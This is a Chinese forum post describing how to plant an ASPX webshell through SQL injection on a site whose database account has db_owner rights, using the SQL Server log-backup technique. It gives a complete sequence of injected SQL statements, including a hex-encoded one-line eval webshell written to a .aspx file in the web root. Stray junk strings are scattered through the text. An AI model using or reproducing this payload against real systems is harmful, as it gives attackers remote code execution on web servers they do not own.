最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
' E6 U; U4 \' x+ b4 ~3 e但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
( r/ \' F3 C* k6 q( v4 ~经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。' B5 M' R9 n1 x# r; y
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。9 @( Z2 {8 R' f7 Q
: u2 u; c. E: R$ `8 ^' }
--------------------------------------------------------------& y0 b7 Q. l- T. f
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
1 Z8 V2 R# g8 s6 V+ J; G自己修改备份语句如下:0 e* u# L' @/ x! w/ o7 s6 r
Drop table cmd;--. o H$ }, `$ l- I
alter database db_test set RECOVERY FULL;--2 g- K/ e- b4 o3 S) D, v9 b
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段1 q3 k# ^/ U/ w! @' C$ _! ]
backup log db_test to disk = 'c:\bak' with init;--6 U' I8 T1 P" S- {5 q
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--+ m7 Q; j6 ~8 k
delete from cmd where id>1;--删除id>1的数据, x8 V F2 V) p5 g
backup log db_test to disk = 'e:\webroot\test.aspx';--
' y( t" n. P' }, @/ u$ L1 n' |6 HDrop table cmd;--
2 F& n; u: s! k. W. v- T! G* I希望对大家有用。 |